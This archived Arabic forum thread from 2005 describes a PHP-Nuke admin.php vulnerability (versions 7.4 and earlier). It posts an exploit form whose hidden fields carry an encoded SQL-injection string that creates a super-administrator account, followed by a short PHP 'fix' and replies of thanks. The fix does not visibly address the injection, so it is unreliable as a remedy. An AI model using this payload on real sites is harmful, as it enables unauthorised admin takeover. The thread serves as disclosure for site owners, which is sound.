منتدى الشبكة الكويتية

منتدى الشبكة الكويتية (https://www.kwety.net/vb/index.php)
-   تطوير المواقع (https://www.kwety.net/vb/forumdisplay.php?f=69)
-   -   ثغرة النيوك , مع سد الثغرة ... (https://www.kwety.net/vb/showthread.php?t=1586)

VIP 28-01-2005 07:15 AM

ثغرة النيوك , مع سد الثغرة ...
 
ثغرة النيوك الجديده , مع الترقيع !
السلام عليكم ورحمة الله وبركاته



الثغرة في ملف : Admin.php

وهي عبارة عن استثمار .. لخطاء برمجي بالملف ,,

يمّكن المخترق من الحصول على حساب ادامن في مجلة النيوك ,,

الاصدارات المصابة : 7.4 وما تحتها من اصدارات ,

وهذا جزء من الكود الاستثماري للثغرة طبعا كود html:

كود:

NOME:
    <input type="text"
name="add_name">
    <br>
    PASSWORD:

    <input type="text"
name="add_pwd">
    <br>
    E-MAIL:
    <input type="text"
name="add_email">
    <br>
    <input type="hidden"
name="admin"
value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
    <br>
    <input type="hidden"
name="add_radminsuper" value="1">
    <br>
    <input type="hidden"
name="op"
value="AddAuthor">
  </p>
  <p>
    <input type="submit"
name="Submit"
value="Create
Admin">
    <br>
  </p>
</form>

الترقيع الصحيح :

قم باضافة هذة السطور الى ملف admin.php

كود:

if ( !empty($HTTP_GET_VARS['op']) )
{
$op = $HTTP_GET_VARS['op'];
}

if ( !empty($HTTP_POST_VARS['op']) )
{
$op = $HTTP_POST_VARS['op'];
}

مع التحية اخواني اصحاب المواقع

برق 29-01-2005 09:37 AM

مشكور اخوي بصراحه معلومه مهمه لاصحاب المواقع المبتدئين

VIP 01-02-2005 04:43 AM

العفو طال عمرك

برق 10-02-2005 09:47 AM

مشكور اخوي على هل شرح الممتاز


الساعة الآن 04:54 AM

جميع الحقوق محفوظة لـ الشبكة الكويتية

التعليقات المنشورة لا تعبر عن رأي الشبكة الكويتية ولا نتحمل أي مسؤولية قانونية حيال ذلك ويتحمل كاتبها مسؤولية النشر